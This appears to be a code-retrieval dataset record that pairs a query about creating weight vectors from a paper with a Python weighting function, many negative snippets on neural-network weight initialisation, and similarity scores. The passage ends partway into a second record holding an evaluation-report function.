[ "0.7190156", "0.6753629", "0.60996735", "0.6064925", "0.6016448", "0.6008773", "0.60022396", "0.60006684", "0.5999985", "0.59736115", "0.5944627", "0.59434086", "0.5941799", "0.5931249", "0.5897575", "0.5877158", "0.5876371", "0.5840248", "0.58335423", "0.58302295", "0.58285284", "0.58272463", "0.5807024", "0.5799569", "0.57845443", "0.5781996", "0.5779757", "0.5770024", "0.575117", "0.5739089", "0.57363075", "0.5735732", "0.5713691", "0.5693648", "0.5693578", "0.56858295", "0.56805944", "0.56687164", "0.5658263", "0.5648382", "0.564504", "0.5644673", "0.56430984", "0.56416816", "0.5638266", "0.5636274", "0.56346494", "0.56346226", "0.5629099", "0.5628261", "0.5614559", "0.56079715", "0.5606076", "0.5605636", "0.55997616", "0.5580656", "0.5579532", "0.556964", "0.5567809", "0.55675817", "0.5566145", "0.5564619", "0.5561161", "0.55587965", "0.55553675", "0.5551361", "0.5542913", "0.5542413", "0.5533799", "0.55314314", "0.5527168", "0.5526548", "0.5526236", "0.5522208", "0.55158806", "0.55117553", "0.5511285", "0.5507037", "0.5503371", "0.54993296", "0.5497811", "0.549305", "0.5489936", "0.5488964", "0.5487613", "0.5484082", "0.54818964", "0.5474708", "0.54729474", "0.5472021", "0.54715574", "0.54663956", "0.54663956", "0.5466015", "0.5461071", "0.54608077", "0.54574543", "0.5455361", "0.5455204", "0.54476535" ]
0.7230312
0
Create weights as defined in Section 5.1 of our paper.
def create_weights(N, weights_type): if weights_type == "uniform": weights = np.array([1 / N,] * N) elif weights_type == "decreasing": normaliser = sum([1 / i for i in range(1, N + 1)]) weights = np.array([1 / (i * normaliser) for i in range(1, N + 1)]) elif weights_type == "increasing": normaliser = sum([1 / i for i in range(1, N + 1)]) weights = np.array([1 / ((N + 1 - i) * normaliser) for i in range(1, N + 1)]) elif weights_type == "centred": if N % 2 == 1: normaliser = sum([1 / (abs((N + 1) / 2 - i) + 1) for i in range(1, N + 1)]) weights = np.array( [1 / ((abs((N + 1) / 2 - i) + 1) * normaliser) for i in range(1, N + 1)] ) else: normaliser = sum( [1 / (abs((N + 1) / 2 - i) + 0.5) for i in range(1, N + 1)] ) weights = np.array( [ 1 / ((abs((N + 1) / 2 - i) + 0.5) * normaliser) for i in range(1, N + 1) ] ) else: raise ValueError( 'The value of weights_type should be "uniform" or' '"decreasing" or "increasing" or "centred".' ) return weights
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_weights(self):\n gate_size = self._hidden_size * self._num_gates\n # Compute the shape of weight and bias.\n matrix_shapes, bias_shapes = [], []\n for layer in range(self._num_layers):\n for direction in range(self._num_directions):\n layer_input_size = self._input_size if layer == 0 \\\n else self._hidden_size * self._num_directions\n w_ih_shape = [gate_size, layer_input_size]\n w_hh_shape = [gate_size, self._hidden_size]\n b_ih_shape, b_hh_shape = [gate_size], [gate_size]\n matrix_shapes.extend([w_ih_shape, w_hh_shape])\n bias_shapes.extend([b_ih_shape, b_hh_shape])\n # Create single float32 weights.\n weights_count = 0\n self._weights_shapes = matrix_shapes + bias_shapes\n for shape in self._weights_shapes:\n weights_count += math_util.prod(shape)\n self._weights = Tensor([weights_count])\n self._weights.requires_grad = True", "def generate_weights(sizes):\n weights = {}\n weights[\"w\"] = []\n weights[\"b\"] = []\n for i in range(len(sizes)-2):\n weights[\"w\"].append(np.random.randn(sizes[i], sizes[i+1]))\n weights[\"b\"].append(np.random.randn(sizes[i+1]))\n weights[\"w_final\"] = np.random.randn(sizes[-2], sizes[-1])/np.sqrt(sizes[-1])\n weights[\"b_final\"] = np.random.randn(sizes[-1])\n return weights", "def weightGenerate(self):\n\t\tfor i in range(0, self.numberOfInput):\n\t\t\tself.weight.append(random.random()-0.5)", "def _generate_weights(self):\n weights = [random.uniform(0, 1) for x in range(self.num_weights)]\n return self._normalize_weights(weights)", "def init_weights_(self):\n raise NotImplementedError", "def get_weights(self):", "def weights_initializer(self):\n self.weights = [np.random.normal(0, 1 / np.sqrt(x), (x, y)) for x, y in list(zip(self.structure[1:], self.structure[:-1]))]", "def InitWeights(self):\n self.w = -1 + 2 * np.random.rand(self.num_of_inputs,)\n self.w0 = -1 + 2 * np.random.rand()", "def gen_W(users, items, ratings):\n\n # initiate graph\n user = users.tolist()\n item = items.tolist()\n rating = ratings.tolist()\n B = nx.Graph()\n B.add_nodes_from(user, bipartite=0)\n B.add_nodes_from(item, bipartite=1)\n\n # create edges\n for i in range(len(user)):\n B.add_edges_from([(user[i], item[i])])\n B[user[i]][item[i]]['weight'] = rating[i]\n\n users_unique = users.unique() \n items_unique = items.unique()\n\n # BiAdjacency matrix - for bipartite network\n W = biadjacency_matrix(B, users_unique,items_unique).toarray()\n\n # sparce form of Biadjacency matrix\n W = spa.csr_matrix(W)\n print('Shape of W: '+str(W.shape))\n\n return W, users_unique, items_unique", "def _create_weights(self):\n\n self.mu_W = tf.get_variable(\n name=\"mu_W\", initializer=tf.random_normal_initializer(),\n shape=[self.rnn_dim, self.z_dim])\n\n self.mu_b = tf.get_variable(\n name=\"mu_b\", initializer=tf.random_normal_initializer(),\n shape=[self.z_dim])\n\n self.log_sig_sq_W = tf.get_variable(\n name=\"log_sig_sq_W\", initializer=tf.random_normal_initializer(),\n shape=[self.rnn_dim, self.z_dim])\n\n self.log_sig_sq_b = tf.get_variable(\n name=\"log_sig_sq_b\", initializer=tf.random_normal_initializer(),\n shape=[self.z_dim])\n \n self.y_W = tf.get_variable(\n name=\"y_W\", initializer=tf.random_normal_initializer(),\n shape=[self.z_dim, self.rnn_dim])\n\n self.y_b = tf.get_variable(\n name=\"y_b\", initializer=tf.random_normal_initializer(),\n shape=[self.rnn_dim])\n \n self.softmax_W = tf.get_variable(\n name=\"softmax_W\", initializer=tf.random_normal_initializer(),\n shape=[self.rnn_dim, self.vocabulary_size])\n \n self.softmax_b = tf.get_variable(\n 
name=\"softmax_b\", initializer=tf.random_normal_initializer(),\n shape=[self.vocabulary_size])", "def init_weight(w):\n shape = w.shape\n if len(shape) == 4:\n i, o, u, v = shape\n k = np.sqrt(6 / (i * u * v + o * u * v))\n w.data.uniform_(-k, k)\n elif len(shape) == 2:\n k = np.sqrt(6 / sum(shape))\n w.data.uniform_(-k, k)\n elif len(shape) == 1:\n w.data.zero_()", "def _initialize_weights(self):\n pass", "def gen_tb_tb_weights(weight=1.):\r\n W = np.zeros([8, 8])\r\n sinusoid = -(np.cos(np.linspace(0, 2 * np.pi, 8, endpoint=False)) - 1) / 2\r\n for i in range(8):\r\n values = np.roll(sinusoid, i)\r\n W[i, :] = values\r\n return weight * W", "def _generate_weights(self):\n weights = []\n for i in range(1, len(self.layers) - 1):\n weights.append(2 * np.random.random(\n (self.layers[i - 1] + 1, self.layers[i] + 1)) - 1)\n weights.append(2 * np.random.random(\n (self.layers[i] + 1, self.layers[i + 1])) - 1)\n return weights", "def init_weights(self):\n \n self.w = np.random.randn(self.D) / np.sqrt(self.D)", "def init_weights(self, dims):\n self.W = np.random.normal(size=dims) * 0.0001", "def initializeWeights(n_in,n_out):\r\n \r\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\r\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\r\n return W", "def initializeWeights(n_in,n_out):\r\n \r\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\r\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\r\n return W", "def weights(self):\r\n\t\treturn None", "def generate_weight(N, J, delta, sigma, z):\n J = numpy.asarray(J)\n delta = numpy.asarray(delta)\n sigma = numpy.asarray(sigma)\n x = numpy.linspace(-0.5, 0.5, N).reshape((1, -1))\n W = numpy.empty((2 * N, 2 * N))\n W[:N, :N] = weight(x, J[0, 0], delta[0, 0], sigma[0, 0], z[:N, :N])\n W[N:, :N] = weight(x, J[1, 0], delta[1, 0], sigma[1, 0], z[N:, :N])\n W[:N, N:] = weight(x, -J[0, 1], -delta[0, 1], sigma[0, 1], z[:N, N:])\n W[N:, N:] = weight(x, -J[1, 1], -delta[1, 1], sigma[1, 1], z[N:, N:])\n return W", "def gen_in_weights(self):\n\n gen = Generator(device = self.device).manual_seed(self.random_seed)\n n, m = self.n_nodes_, self.n_inputs_\n in_w_shape_ = (n, m)\n print('m,n', m,n)\n\n #at the moment all input weight matrices use uniform bias.\n self.bias = rand( n, 1, generator = gen, device = self.device) * 2 - 1\n\n #weights\n if self.input_weight_type_ == \"uniform\":\n self.in_weights = rand((n,m), generator = gen, device = self.device)\n self.in_weights = self.in_weights * 2 - 1\n print('in_weights', self.in_weights.shape)\n\n elif self.input_weight_type_ == \"exponential\":\n printc(\"BUILDING SIGN_\", 'fail')\n sign1 = random_state.choice([-1, 1], size= (in_w_shape_[0], in_w_shape_[1]//2))\n sign2 = random_state.choice([-1, 1], size= (in_w_shape_[0], in_w_shape_[1]//2))\n\n self.sign_dual = (sign1, sign2)\n self.sign = np.concatenate((sign1, sign2), axis = 1)\n\n #regularization\n self.feedback_weights = rand(n, 1, **self.tensorArgs, generator = gen) * 2 - 1\n\n #regularization\n self.noise_z = normal(0, 1, size = (n, m), **self.tensorArgs, generator = gen)", "def create_weight_matrices(self):\n rad = 1 / np.sqrt(self.no_of_in_nodes)\n X = truncated_normal(mean=0, \n sd=1, \n low=-rad, \n upp=rad)\n self.wih = X.rvs((self.no_of_hidden_nodes, \n self.no_of_in_nodes))\n rad = 1 / np.sqrt(self.no_of_hidden_nodes)\n X = truncated_normal(mean=0, sd=1, low=-rad, upp=rad)\n self.who = X.rvs((self.no_of_out_nodes, \n self.no_of_hidden_nodes))", "def weights(self):\n \n n = self.n\n lambda_ = self.alpha**2 * (n +self.kappa) - n\n \n c = 
.5 / (n + lambda_)\n Wc = np.full(2*n + 1, c)\n Wm = np.full(2*n + 1, c)\n Wc[0] = lambda_ / (n + lambda_) + (1 - self.alpha**2 + self.beta)\n Wm[0] = lambda_ / (n + lambda_)\n \n return Wm, Wc", "def initializeWeights(n_in,n_out):\n \n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\n return W", "def initWeights(self):\n self.weights = []\n self.bias = []\n for i, dim in enumerate(self.dimensions[1:]):\n self.weights.append(np.random.uniform(-1,1,(self.dimensions[i],dim)))\n self.bias.append(np.random.uniform(-1,1,dim))", "def initializeWeights(n_in,n_out):\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\n return W", "def initializeWeights(n_in,n_out):\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\n return W", "def initializeWeights(n_in,n_out):\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\n return W", "def initialize_weights(self):\n # compute lmda.\n self.lmda = float(self.c)/float(self.N)\n # bias term. This should not get a regularization penalty.\n self.bias = {}\n # weight vector\n self.w = {}\n # lastW[j] = k, indicates that feature j was last updated at time k.\n self.lastW = {}\n for lbl in self.labels:\n self.bias[lbl] = 0\n self.w[lbl] = {}\n self.lastW[lbl] = {}\n pass", "def default_weight_initializer(self):\n self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]\n self.weights = [np.random.randn(y, x)/np.sqrt(x)\n for x, y in zip(self.sizes[:-1], self.sizes[1:])]", "def init_weights(model):\n ...", "def initialize_weights_xavier(self):\n\t\tself.weights = [np.random.uniform(-1/sqrt(size1), 1/sqrt(size1)) for size1, size2 in zip(self.sizes[:-1], self.sizes[1:])]\n\t\tself.biases = [np.zeros([size, ]) for size in self.sizes[1:]]", "def my_assign_weights(context, data):\n pass", "def initializeWeights(n_hidden_units, n_inputs, n_outputs):\n W1 = np.random.randn(n_hidden_units, n_inputs) * np.sqrt(1/(n_inputs*n_hidden_units))\n W2 = np.random.randn(n_outputs, n_hidden_units) * np.sqrt(1/(n_hidden_units*n_outputs))\n b1 = np.random.randn(n_hidden_units, 1) * np.sqrt(1/n_hidden_units)\n b2 = np.random.randn(n_outputs, 1) * np.sqrt(1/n_outputs)\n return W1, b1, W2, b2", "def initialize_weights(training_points):\n N = len(training_points)\n ans = {}\n for p in training_points:\n ans[p] = make_fraction(1, N)\n return ans", "def update_weights(self):\n\t\tpass", "def init_weights(self):\n # Initialize weights\n self.apply(self._init_weights)\n # Tie weights if needed\n self.tie_weights()", "def initialize_weights(self, weights_initializer, bias_initializer):\n wshapes = [\n [self.input_size, self.hidden_size[0]],\n [self.hidden_size[0], self.hidden_size[1]],\n [self.hidden_size[1], self.output_size]\n ]\n\n bshapes = [\n [1, self.hidden_size[0]],\n [1, self.hidden_size[1]],\n [1, self.output_size]\n ]\n\n self.weights = [init_weights(s, weights_initializer) for s in wshapes]\n self.biases = [init_weights(s, bias_initializer) for s in bshapes]\n\n self.trainable_variables = self.weights + self.biases", "def setWeights(self, w):\n raise NotImplementedError", "def initialize_weights(self):\n w1 = np.random.uniform(-1.0, 1.0, size = self.n_hidden * (self.n_features + 1)).reshape(self.n_hidden, (self.n_features + 1))/(self.n_features + 1)\n w2 = np.random.uniform(-1.0, 1.0, size=self.n_output*(self.n_hidden+1)).reshape(self.n_output, 
self.n_hidden+ 1)/(self.n_hidden + 1)\n return w1, w2", "def instantiate_weights(self):\n self.product_embeddings = tf.get_variable(\n name='product_embeddings',\n shape=[50000, 300],\n dtype=tf.float32\n )\n self.aisle_embeddings = tf.get_variable(\n name='aisle_embeddings',\n shape=[250, 50],\n dtype=tf.float32\n )\n self.department_embeddings = tf.get_variable(\n name='department_embeddings',\n shape=[50, 10],\n dtype=tf.float32\n )\n self.W_relu = tf.get_variable(\"W_relu\",shape=[670, 30]) #这个参数后续需要自适应\n self.b_relu = tf.get_variable(\"bias_relu\",shape=[30]) \n self.W_projection = tf.get_variable(\"W_projection\",shape=[30, 1]) \n self.b_projection = tf.get_variable(\"bias_projection\",shape=[1])", "def make_weights_for_balanced_classes(self):\n\n count = [0] * self.get_num_classes()\n\n # label = self.class_map_dict[self.meta_data.loc[image_id]['dx']]\n # labels = [self.class_map_dict[l] for l in self.get_labels()]\n\n labels = self.get_labels()\n\n # Count how many instances there are for each class\n for l in labels:\n count[l] += 1\n\n weight_per_class = [0.] * self.get_num_classes()\n\n N = float(sum(count))\n\n # Assign a weight which is inversely proportional to class frequency\n for i in range(self.get_num_classes()):\n weight_per_class[i] = N/float(count[i])\n\n # Save results for debugging purposes\n self._weight_per_class = weight_per_class\n\n # Now assign a weight to each data point\n weight = [0] * len(labels)\n\n for idx, val in enumerate(labels):\n weight[idx] = weight_per_class[val]\n\n return weight", "def _mutate_weights(self, weights):\n return weights + normal(loc=0, scale=self.standard_deviation, size=weights.shape[0])", "def weights(self) -> List[float]:", "def __initialize_weights__(num_neurons: int) -> np.ndarray:\n\n weights = np.zeros((num_neurons, num_neurons))\n\n return weights", "def init_weights(num_tilings, tiles_per_dim, num_dims, num_actions):\n weights = np.zeros((num_tilings*tiles_per_dim**num_dims*num_actions))\n return weights", "def set_weights(self, weights):\r\n self.weights = weights", "def _generate_weighted_matrices(self):\n self.degree_weighted_matrices = dict()\n mes = []\n args = []\n for metaedge, matrix in self.adj_matrices.items():\n mes.append(metaedge)\n args.append({'matrix': matrix, 'w': self.w, 'degree_fwd': self.out_degree[metaedge],\n 'degree_rev': self.in_degree[metaedge]})\n res = parallel_process(array=args, function=mt.weight_by_degree, use_kwargs=True, n_jobs=self.n_jobs,\n front_num=0)\n for metaedge, matrix in zip(mes, res):\n self.degree_weighted_matrices[metaedge] = matrix", "def ComputeWeights(self, p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def _build_multinomial_weights(self) -> None:\n weights_obs = ramp_up_weights(\n len(self.obs), self.tpe.full_weight_num, self.tpe.equal_weight\n )\n counts_obs = numpy.bincount(\n self.obs, minlength=len(self.choices), weights=weights_obs\n )\n counts_obs = counts_obs + self.tpe.prior_weight\n self.weights = counts_obs / counts_obs.sum()", "def _set_weights(self, weights):\r\n self.weights = weights.reshape(self.output_size, self.input_size+1)", "def _set_initial_weights(self):\n weights = {'h0': None, 'y': None}\n weights['h0'] = np.array([[-0.6, 0.4, 0.5], [-0.2, 0.8, 0.8]])\n weights['y'] = np.array([[-0.3, -0.4, 0.9]])\n \n return weights", "def init_weights(self, size):\n\n w = np.random.uniform(-0.5, 0.5, size + 1) # creates array with length size\n return w", "def __create_conv_weights(self, conv_weights):\n\n conv_xform_weights = []\n curr_n = 32\n 
k = 5\n for idx, conv_w in enumerate(conv_weights):\n\n curr_n = self.n_values[idx]\n W = self.__create_W_matrix(curr_n, conv_w)\n conv_xform_weights.append(W)\n\n return conv_xform_weights", "def init_weights(self):\n for i in range(5):\n default_init_weights(getattr(self, f'conv{i+1}'), 0.1)", "def _write_weights(self, write_gates, usage):\n\n write_allocation_weights = self._allocation_weights(write_gates, self.num_write_heads, usage)\n write_gate = write_gates.unsqueeze(-1)\n write_weights = write_gate*write_allocation_weights\n return write_weights", "def default_weights(n):\n return np.array([1/n for _ in range(n)])", "def init_weight(self):\n init_bn(self.norm0)", "def GetTrainWeights(Labels,Weights):\n Weights = np.where(Weights > 0, Weights, 0) #Setting negative weights to zero for training\n ReferenceLength = len(Labels[Labels == 0])\n for Class in np.unique(Labels):\n CWeight = np.sum(Weights[Labels == Class])\n RenormFactor = ReferenceLength/CWeight\n Weights = np.where(Labels != Class,Weights,Weights*RenormFactor)\n \n return Weights", "def init_weights(self):\n # Initialize weights\n self.apply(self._init_weights)", "def init_weights(no_input, no_hidden, no_output):\r\n weight_lst = []\r\n no_of_weights = (no_input * no_hidden) + (no_hidden * no_output)\r\n\r\n for weight in range(no_of_weights):\r\n weight = 0.01 * random.random()\r\n weight_lst.append(weight)\r\n\r\n return weight_lst", "def numWeights(self):\r\n\t\treturn None", "def init_weights(self, input_size=None, min_w=WEIGHT_MIN,\n max_w=WEIGHT_MAX):\n if input_size is None:\n input_size = self.INPUT_SIZE\n\n # Add a bias weight to each neuron\n weights_per_neuron = input_size + 1\n\n self.weights = np.random.rand(self.size, weights_per_neuron) \\\n * (max_w - min_w) + min_w", "def weight(self):", "def init_weights(self, num_features):\n for each_label in self.valid_labels:\n self.weights[each_label] = np.zeros(num_features)", "def init_weights(self) -> None:\n nn.init.kaiming_normal_(self._U)\n nn.init.kaiming_normal_(self._W)\n nn.init.kaiming_normal_(self._V)\n\n nn.init.normal_(self._b)", "def init_weights(self):\n self.embedding.weight.data.uniform_(-0.1, 0.1)\n self.word.bias.data.fill_(0)\n self.word.weight.data.uniform_(-0.1, 0.1)", "def __init__(self, weights):\n self._weights = weights", "def get_weights(self):\n return [self.w, self.b]", "def init_weights(w_shape, layer_index, weight_initializer):\n\n return tf.Variable(weight_initializer(w_shape), name=\"weight{}\".format(layer_index))", "def setupWeightComputation(self, file, weight, p, wordsize, ignoreMSBs = 0):\n file.write(\"weight: BITVECTOR(16);\\n\")\n file.write(self.getWeightString(p, wordsize, ignoreMSBs) + \"\\n\")\n file.write(\"ASSERT(weight = {0:#018b});\\n\".format(weight))\n return", "def gen_weights(self, f_target):\n\n # calculate x and psi\n x_track = self.cs.rollout()\n psi_track = self.gen_psi(x_track)\n\n # efficiently calculate BF weights using weighted linear regression\n self.w = jnp.zeros((self.n_dmps, self.n_bfs))\n for d in range(self.n_dmps):\n # spatial scaling term\n k = self.goal[d] - self.y0[d]\n for b in range(self.n_bfs):\n numer = jnp.sum(x_track * psi_track[:, b] * f_target[:, d])\n denom = jnp.sum(x_track ** 2 * psi_track[:, b])\n self.w[d, b] = numer / denom\n if abs(k) > 1e-5:\n self.w[d, b] /= k\n\n self.w = jnp.nan_to_num(self.w)", "def init_weights(self):\n\n r = np.sqrt(1.) 
/ np.sqrt(self.fc3.in_features +\n self.fc3.out_features)\n self.fc3.weight.data.uniform_(-r, r)\n self.fc3.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc1.in_features +\n self.fc1.out_features)\n self.fc1.weight.data.uniform_(-r, r)\n self.fc1.bias.data.fill_(0)", "def _make_sample_weights(n_repetitions, n_samples, random_state):\n sample_weights = np.zeros((n_repetitions, n_samples), dtype=np.float64)\n\n for repetition in range(n_repetitions):\n sample_weights[repetition] = random_state.rand(n_samples) + 1\n\n return sample_weights", "def generate_weights(n_features, hidden_layer_sizes, n_out):\n\n weights = []\n biases = []\n\n # Weights from input layer to first hidden layer\n weights.append(init_weight(hidden_layer_sizes[0], n_features))\n biases.append(init_bias(hidden_layer_sizes[0]))\n\n # Weights from one hidden layer to the next\n for i in range(1, hidden_layer_sizes.size):\n weights.append(\n init_weight(hidden_layer_sizes[i],hidden_layer_sizes[i - 1]))\n biases.append(init_bias(hidden_layer_sizes[i]))\n\n # Weights from last hidden layer to output layer\n weights.append(init_weight(n_out, hidden_layer_sizes[-1]))\n biases.append(init_bias(n_out))\n\n return weights, biases", "def weights(self, weights):\n\n self._weights = weights", "def build(self,input_shape):\n\n self.w = self.add_weight(shape=(input_shape[-1],self.units),\n initializer='random_normal',\n trainable=True)\n self.b = self.add_weight(shape=(self.units,),\n initializer='random_normal',\n trainable=True)", "def _init_weights(n_rows, n_cols, std_dev=0.5):\n weights = np.random.randn(n_rows, n_cols) * std_dev\n return weights", "def generate_weighted_graph():\n \n Adj_Matrix = np.array([\n [0.0, 0.2, 0.2, 0.3, 0.2, 0.1],\n [0.1, 0.0, 0.3, 0.3, 0.1, 0.2],\n [0.3, 0.2, 0.0, 0.1, 0.2, 0.2],\n [0.1, 0.4, 0.2, 0.0, 0.2, 0.1],\n [0.2, 0.2, 0.2, 0.2, 0.0, 0.2],\n [0.2, 0.1, 0.1, 0.3, 0.3, 0.0]\n ])\n\n return Adj_Matrix", "def setWeightInitializer(self,weights):\n self.init_w = weights", "def init_weights(self, load_weights=None):\n if load_weights:\n # TODO\n pass\n else:\n # x: lower layer nodes n\n # y: current layer nodes n\n x = self.weights_shape[1]\n y = self.weights_shape[0]\n self.weights = np.random.randn(y, x) / np.sqrt(x) # pylint: disable=no-member\n self.biases = np.random.randn(y, 1) # pylint: disable=no-member", "def _buildWeights(self):\r\n # Compute the spatial tree\r\n kd = spatial.cKDTree(self.XYin)\r\n \r\n # Perform query on all of the points in the grid\r\n dist,self.ind=kd.query(self.XYout,distance_upper_bound=self.maxdist,k=self.NNear)\r\n \r\n self.Nc = np.size(self.ind,axis=0)\r\n print '%d interpolation points.'%self.Nc\r\n # Now loop through and get the weights for each point\r\n self.W = np.zeros((self.NNear,self.Nc))\r\n\r\n # Print percentages\r\n p0=0\r\n pstep=5\r\n for ii in range(0,self.Nc):\r\n \r\n if self.verbose:\r\n pfinish = float(ii)/float(self.Nc)*100.0\r\n if pfinish> p0:\r\n print '%3.1f %% complete...'%pfinish\r\n p0+=pstep\r\n \r\n W = self.getWeights(dist[ii,:],self.XYin[self.ind[ii,:],0],self.XYin[self.ind[ii,:],1])\r\n self.W[:,ii] = W.T", "def init_sg_weights(self):\n n = self.weights_shape[0] # size of current layer\n # pylint: disable=no-member\n A = np.random.randn(n, n) / np.sqrt(n)\n B = np.random.randn(10, n) / np.sqrt(n)\n C = np.random.randn(1, n) / np.sqrt(n)\n # pylint: enable=no-member\n self.sg_weights = [A, 
B, C]", "def initialize_weights(self, seed=None):\r\n if seed!=None:\r\n np.random.seed(seed)\r\n self.weights = np.random.randn(self.number_of_nodes,self.input_dimensions)", "def WeightInitializer():\n return np.random.uniform(-1, 1)", "def _allocation_weights(self, write_gates, num_writes, usage):\n write_gates = write_gates.unsqueeze(-1)\n allocation_weights = []\n for i in range(num_writes):\n allocation = self._allocate(usage)\n allocation_weights.append(allocation)\n usage = usage + ((1-usage)*write_gates[:, i, :]*allocation_weights[i])\n allocation_weights = torch.stack(allocation_weights, 1)\n return allocation_weights", "def init_weights(self):\n r = np.sqrt(6.) / np.sqrt(self.fc1.in_features +\n self.fc1.out_features)\n self.fc1.weight.data.uniform_(-r, r)\n self.fc1.bias.data.fill_(0)\n r = np.sqrt(6.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)", "def calc_assn_weights():\n\t\n\t\t\t#\n\t\t\t#\n\ttext(\"\"\"INSERT INTO assignments (mentor_id, course_id, cost)\n\t\t\tSELECT M.mentor_id, C.course_id, SUM(COALESCE(PW.weight_value,PT.def_weight_val))\n\t\t\tFROM mentors M, courses C\n\t\t\tJOIN course2pref C2P ON C2P.course_id = C.course_id\n\t\t\tJOIN prefs P ON P.pref_id = C2P.pref_id\n\t\t\tJOIN pref_types PT ON PT.pref_type_id = P.pref_type_id\n\t\t\tJOIN pref_weights PW ON PW.pref_type_id = P.pref_type_id\n\t\t\tLEFT JOIN choices Ch ON Ch.mentor_id = M.mentor_id AND Ch.weight_id = PW.pref_id", "def get_data_with_weights(self):\n weights = np.zeros((self.contexts.shape[0], self.num_actions))\n a_ind = np.array([(i, val) for i, val in enumerate(self.actions)])\n weights[a_ind[:, 0], a_ind[:, 1]] = 1.0\n return self.contexts, self.rewards, weights", "def apply_weights(self):\n w0_array = np.ones(self.N)*self.w0\n return w0_array + self.X.dot(self.w)", "def get_weights(self, nn_weights, rov_id): # Get weights from CCEA population\n\n for w in range(self.n_weights):\n self.weights[rov_id, w] = nn_weights[w]", "def _degree_weight_weighted_matrices(self):\n for meta_edge, matrix in self.degree_weighted_matrices.items():\n self.degree_weighted_matrices[meta_edge] = matrix.multiply(self.weighted_adj_matrices[meta_edge])", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def fama2(self, n, weight, nums):\n ws = {0}\n for i in range(0, n):\n ts = set()\n for j in range(0, nums[i]):\n for w in ws:\n ts.add(weight[i] * (j + 1) + w)\n ws = ws.union(ts)\n for j in range(0, nums[i]):\n ws.add(weight[i] * (j + 1))\n return len(ws)", "def weight_setup(self, weighting):\n if weighting == \"overlap\":\n self.weights = overlap_generator(overlap, self.graph)\n elif weighting == \"unit\":\n self.weights = overlap_generator(unit, self.graph)\n elif weighting == \"min_norm\":\n self.weights = overlap_generator(min_norm, self.graph)\n else:\n self.weights = overlap_generator(normalized_overlap, self.graph)", "def weights(self, pad=0, feather=0, apply=False, mode='raised cosine'):\n # find dimensions of matrix\n sh = getattr(self, self.fields[0]).shape\n if len(sh)==3:\n ny, nx, nband = sh\n else:\n nband =1\n ny, nx = sh\n # allocate for weights matrix\n self.weight = np.ones((ny,nx), dtype=float)\n # feathering the weight matrix\n if feather:\n if mode == 'raised cosine':\n self.raised_cosine_weights(pad, feather)\n elif mode == 'gaussian':\n self.gaussian_weights(pad, feather)\n if pad:\n self.pad_edges(pad)\n # if applying the weights to the original 
z data\n if apply:\n for field in self.fields:\n if nband > 1:\n for band in range(nband):\n getattr(self, field)[:,:,band] *= self.weight\n else:\n getattr(self, field)[:,:] *= self.weight\n return self", "def get_weights(self, size, name='W'):\n\t\treturn self._initW(size, name)", "def set_weights(self, weights):\n self._weights = weights\n self.normalize_weights() ########################added\n #self.get_weights()", "def get_weights(self):\n return []", "def __init__(self, weights:np.ndarray):\n self.w = weights.copy()" ]
[ "0.7466049", "0.7392558", "0.7357619", "0.72760403", "0.71676654", "0.7089966", "0.7077687", "0.70380753", "0.7031394", "0.7028164", "0.7026333", "0.70108604", "0.69093025", "0.69080865", "0.68695116", "0.68506765", "0.6768174", "0.6768174", "0.6765752", "0.67634475", "0.67488414", "0.6747982", "0.6745061", "0.6725261", "0.67054415", "0.669429", "0.669429", "0.669429", "0.66904694", "0.66880125", "0.6683625", "0.66819024", "0.66602176", "0.66510737", "0.66196394", "0.66082466", "0.658591", "0.6557125", "0.6536917", "0.6532068", "0.65275294", "0.6516978", "0.65090597", "0.64876497", "0.6464693", "0.6462223", "0.6461195", "0.6449746", "0.64389765", "0.64385223", "0.6432014", "0.6425508", "0.641518", "0.6407862", "0.6401697", "0.63959134", "0.6385981", "0.63849574", "0.63814014", "0.63799906", "0.6375351", "0.6368261", "0.6366396", "0.6360322", "0.63579106", "0.63566613", "0.6348568", "0.6339457", "0.6321952", "0.63057154", "0.6292362", "0.62876654", "0.628676", "0.62816834", "0.62716204", "0.6270287", "0.62692904", "0.62685794", "0.62471855", "0.62447095", "0.6237987", "0.6237306", "0.6224132", "0.62220436", "0.6208041", "0.6205188", "0.62011504", "0.6199975", "0.61994743", "0.61925566", "0.61908275", "0.61783296", "0.61746085", "0.6172446", "0.6167409", "0.6158438", "0.6148874", "0.61458814", "0.61452067", "0.613003" ]
0.6555952
38
Runs evaluate on the provided data and generates a detailed error report
def make_report(self, report_name, id_test, x_test, y_test, country_test, frame_test): if not os.path.exists('Reports/' + report_name): os.mkdir('Reports/' + report_name) results = self.predict(x_test) # Generate detailied evaluation report header = 'Country,Child,Frame' for output_layer in self.get_config()['output_layers']: header += ',{}_Actual'.format(output_layer[0]) for output_layer in self.get_config()['output_layers']: header += ',{}_Prediction'.format(output_layer[0]) header += '\n' with open('Reports/{}/evaluation_report.txt'.format(report_name), 'a') as f: if os.stat('Reports/{}/evaluation_report.txt'.format(report_name)).st_size == 0: f.write(header) for row in range(len(results)): entry = ','.join([str(i) for i in country_test[row]]) + ',' entry += ','.join([str(i) for i in id_test[row]]) + ',' entry += ','.join([str(i) for i in frame_test[row]]) + ',' entry += ','.join([str(i) for i in y_test[row]]) + ',' entry += ','.join([str(i) for i in results[row]]) 